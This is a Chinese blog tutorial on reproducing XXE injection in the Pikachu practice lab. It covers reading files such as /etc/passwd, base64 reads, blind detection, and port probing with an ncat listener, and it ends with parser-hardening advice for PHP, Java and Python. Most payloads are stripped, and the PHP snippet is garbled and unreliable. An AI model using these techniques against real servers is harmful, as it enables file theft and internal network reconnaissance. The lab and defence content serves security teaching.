XXE漏洞复现实操

文章目录

  • 一、漏洞原理
  • 二、验证payload
  • 三、没有回显时的验证
  • 四、漏洞特征
  • 五、读取文件
  • 六、Base64加密读取
  • 七、端口检测
  • 八、使用php检测端口
  • 九、dtd外部实体读取文件
  • 十、Xxe漏洞防御

一、漏洞原理

(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞, XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据
(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞
实验环境:windows pikachu xxe漏洞

二、验证payload

]>
&hacker;
XXE漏洞复现实操_第1张图片

三、没有回显时的验证

]>
&xxe;
XXE漏洞复现实操_第2张图片

四、漏洞特征

Accept里有application/xml的格式
XXE漏洞复现实操_第3张图片

五、读取文件

]> &f;

XXE漏洞复现实操_第4张图片

六、Base64加密读取

]> &f;

在这里插入图片描述
XXE漏洞复现实操_第5张图片

或则读取linux的/etc/passwd

]> &f;

七、端口检测

ncat -lvp 4000(端口可自定义)
使用以下语句尝试是否能够建立连接

]>&xxe;
如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
XXE漏洞复现实操_第6张图片

八、使用php检测端口

]>
&xxe;
EOF;
d a t a = s i m p l e x m l l o a d s t r i n g ( data=simplexml_load_string( data=simplexmlloadstring(xml);
print_r($data);
?>
端口关闭的情况如下
XXE漏洞复现实操_第7张图片

开启时
XXE漏洞复现实操_第8张图片

九、dtd外部实体读取文件

[%d;]>
&eviltest;

XXE漏洞复现实操_第9张图片

十、Xxe漏洞防御

1、使用开发语言提供的禁用外部实体的方法
1.PHP:
libxml_disable_entity_loader(true);
2.JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
3.Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

你可能感兴趣的:(web安全)